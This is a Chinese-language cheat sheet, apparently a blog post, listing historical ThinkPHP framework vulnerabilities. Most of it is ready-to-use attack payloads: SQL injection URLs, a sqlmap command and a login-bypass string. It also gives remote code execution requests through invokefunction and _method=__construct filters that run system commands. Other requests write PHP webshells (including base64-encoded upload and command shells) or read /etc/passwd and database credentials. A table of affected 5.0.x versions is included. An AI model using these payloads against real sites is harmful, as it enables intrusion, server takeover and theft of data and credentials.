ThinkPhp常见历史漏洞小结

/?s=/abc/abc/abc/{${phpinfo()}}
index.php/module/action/param1/${@print(THINK_VERSION)} 执行命令
index.php/module/action/param1/$%7B@print(phpinfo())%7D 查看版本
appscn/index.php/module/action/param1/$%7B@print(phpinfo())%7D 爆路径
index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D 爆路径
index.php/Index/index/name/$%7B@phpinfo%28%29%7D Thinkphp 3.0-3.1版代码执行


Thinkphp3.2.3最新版update注入漏洞
/index.php/home/user?id[]=bind&id[]=1%27&money[]=1123&user=liao
money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))

Thinkphp框架 3.2.x sql注入漏洞
/index.php?name[0]=bind&name[1]=0 and updatexml(2,concat(0x7e,user()),0)

ThinkPHP3.2 框架sql注入漏洞
table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

where:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

 

ThinkPHP 3.0~3.2 注入漏洞
地址:http://xx.com/index.php/Admin.php?s=/User/Public/check

payload:act=verify&username[0]=='1')) AND UPDATEXML(6026,CONCAT(0x2e0x7167656371,(SELECT (CASE WHEN (6026=6026) THEN 1 ELSE 0 END)),0x716e726771),8197)-- 1between&username[1]=CN000001&password=xxxxxxxxxxx&image.x=65&image.y=15&_hash_=e23b2ac1ecea61a34252c0c93d28a8b6_b9327556a986738edb45004015776680


thinkphp的调试模式开启 才可以利用

ThinkPHP 3.1、3.2一个通用的sql注入

c:\sqlmap>sqlmap.py -u http://xxx.com/?user[0]=* --dbms mysql --tech b --tamper "thinkphp.py" --dbs


ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞, ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法
请求地址:
http://localhost/Main?id=boo” or 1=”1

http://localhost/Main?id=boo%22%20or%201=%221


Thinkphp5X设计缺陷导致泄漏数据库账户密码
注册登录成功后,直接GET请求 http://xxx.com/home/messages/batchRead?ids[0'\]=1


Thinkphp5 SQL注入
http://localhost/thinkphp5/public/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1231

thinkphp3.1、3.2 万能密码
username[0]=exp&username[1]=aa'or 1=1%23&password=1


/public/index.php?s=captcha
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

_method=__construct&method=get&filter[]=assert&get[]=assert(baSe64_decode ('DQpmaWxlX3B1dF9jb250ZW50cygnMS5waHAnLGJhc2U2NF9kZWNvZGUgKCdQRDl3YUhBZ0lBMEtKR0VnUFNCemRISmZjbVZ3YkdGalpTZ2llSGdpTENJaUxDSnpkSGg0Y2w5eVpYaDRjR3hoZUhoalpTSXBPdzBLSkdJZ1BTQWtZU2dpZUNJc0lpSXNJbkI0Y25obGVHZGZlSEo0Wlhod2VHeDRZWGhqWlNJcE93MEtKR01nUFNBa1gxSkZVVlZGVTFSYkozaDRZeWRkT3cwS0pHSW9KeTh1S2k5bEp5d25JQ2N1SkdNc0p5Y3BPdzBLUHo0PScpKQ=='))

/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell1.php&vars[1][]=<?phpinfo();?>i 写shell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo ()


system() has been disabled for security reasons system函数被禁用 请使用上面那条
未定义数组索引: __construct 也是可以搞得

/index.php?s=captcha&m=1

_method=__construct&filter[]=think\__include_file&get[]=/www/wwwroot/www.xx.com/public/upload/20190325/a97b74cbc42a4cd32206621b77aa850a.jpg&method=get&server[]=

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/home/wwwroot/xxx.com/admin/public/favicon.ico&x=phpinfo(); 文件包含突破php7

_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
or
_method=__construct&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('35.php',base64_decode('PD9waHAKIGVycm9yX3JlcG9ydGluZygwKTsKJGM9JF9HRVRbJ2NtZCddOwpzeXN0ZW0oJGMpOwokcD0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOwokeW9jbz1kaXJuYW1lKF9fRklMRV9fKTsKZWNobyA8PDxIVE1MCjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiICBtZXRob2Q9IlBPU1QiPgpQYXRoOiRwPGJyPgo8aW5wdXQgbmFtZT0iZmlsZSIgdHlwZT0iZmlsZSI+PGJyPgrEv7HqOjxicj4KPGlucHV0IHNpemU9IjQ4IiB2YWx1ZT0iJHlvY28vIiBuYW1lPSJwdCIgdHlwZT0idGV4dCI+PGJyPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVXBsb2FkIj4KJHRlbmQKSFRNTDsKaWYgKGlzc2V0KCRfUE9TVFsicHQiXSkpewokdXBsb2FkZmlsZSA9ICRfUE9TVFsicHQiXS4kX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXTsKaWYgKCRfUE9TVFsicHQiXT09IiIpeyR1cGxvYWRmaWxlID0gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl07fQppZiAoY29weSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICR1cGxvYWRmaWxlKSl7CmVjaG8idXBsb2FkZWQ6JHVwbG9hZGZpbGVuIjsKZWNobyJTaXplOiIuJF9GSUxFU1siZmlsZSJdWyJzaXplIl0uIm4iOwp9ZWxzZSB7CnByaW50ICJFcnJvcjpuIjsKfQp9Pz4='));


那就是这个漏洞并不通杀
笔者后续对比了官方多个发布的5.0版本,大概总结出如下结论

版本名 是否可被攻击 攻击条件
5.0.0 否 无
5.0.1 否 无
5.0.2 否 无
5.0.3 否 无
5.0.4 否 无
5.0.5 否 无
5.0.6 否 无
5.0.7 否 无
5.0.8 是 无需开启debug
5.0.9 是 无需开启debug
5.0.10 是 无需开启debug
5.0.11 是 无需开启debug
5.0.12 是 无需开启debug
5.0.13 是 需开启debug
5.0.14 是 需开启debug
5.0.15 是 需开启debug
5.0.16 是 需开启debug
5.0.17 是 需开启debug
5.0.18 是 需开启debug
5.0.19 是 需开启debug
5.0.20 否 无
5.0.21 是 需开启debug
5.0.22 是 需开启debug
5.0.23 是 需开启debug
----------------------------------------------------------------------------------------------------------------------------------------
5.0.24 /public/index.php?s=captcha
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
/admin/common/upload.shtml 未授权上传点 参考资料 https://www.t00ls.net/thread-60829-1-1.html
----------------------------------------------------------------------------------------------------------------------------------------
5.0.x

/?s=index/think\config/get&name=database.username # 获取配置信息
/?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件
/?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

5.1.x

/?s=index/\think\Request/input&filter[]=system&data=pwd
/?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
----------------------------------------------------------------------------------------------------------------------------------------
ThinkPhp5 系列
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter[]=phpinfo&get[]=-1
_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
_method=_constrcuct&filter[]=assert&method=get&server[REQUEST_METHOD]=phpinfo()
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell的
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=axgg.php&vars[1][]=<?php @eval($_POST[1]);?>
think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo'%3C?php%20@eval($_POST[1]);?%3E%27%3E.axgg.php
s=file_put_contents('axgg.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
读取文件的
_method=__construct&filter[]=scandir&filter[]=var_dump&method=GET&get[]=/data/app/lottery/public //罗列目录位置
_method=__construct&filter[]=highlight_file&method=GET&get[]=/etc/passwd
s=include("/etc/passwd")&_method=__construct&filter=assert

上一篇:Thinkphp in-sqlinjection命令执行漏洞


下一篇:读取PHPExcel修改的.xls文件时xlrd崩溃